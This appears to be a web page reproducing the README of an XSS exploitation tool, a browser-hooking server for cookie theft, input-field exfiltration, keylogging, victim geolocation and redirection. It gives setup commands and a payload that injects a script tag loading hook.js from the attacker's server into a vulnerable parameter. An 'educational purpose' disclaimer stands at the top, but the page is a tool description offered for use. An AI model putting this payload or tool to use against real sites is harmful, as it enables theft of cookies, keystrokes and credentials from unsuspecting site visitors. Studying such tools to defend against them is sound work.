XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.
This tool is only for educational purpose, do not use it against real environment
Cross-site scripting (XSS) is a common web vulnerability that allows an attacker to inject malicious code into a website, which then executes in the browser of any user who visits the site. This type of attack can result in sensitive information being stolen or altered, as well as unauthorized actions being taken on behalf of the user. XSS attacks are typically carried out by exploiting vulnerabilities in web applications that allow input from users to be interpreted as code.
There are several types of XSS exploits, including reflected and stored XSS. Reflected XSS occurs when an attacker sends a specially crafted link to a victim, which then triggers the execution of malicious code on the victim’s computer. Stored XSS, on the other hand, involves injecting malicious code directly into a website’s database so that it is executed every time someone accesses that page.
Features
- Technical Data about victim browser
- Geolocation of the victim
- Snapshot of the hooked/visited page
- Source code of the hooked/visited page
- Exfiltrate input field data
- Exfiltrate cookies
- Keylogging
- Display alert box
- Redirect user
Installation of XSS Exploitation Tool
Tested on Debian 11
You may need Apache, Mysql database and PHP with modules:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html
Install Git and pull the XSS-Exploitation-Tool source code:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
Install composer, then install the application dependencies:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/
Init the database of XSS Tool
$ sudo mysql
Creating a new user with specific rights:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
Creating the database (will result in an empty page):
Visit the page http://server-ip/reset_database.php
Adapt the javascript hook file for XSS Exploitation Tool
The file hook.js is a hook. You need to replace the ip address in the first line with the XSS Tool server ip address:
var address = "your server ip";
How it works
First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
Then, when victims visit the hooked page, the XSS Tool server should list the hooked browsers:
Screenshots
For more Scripts click HERE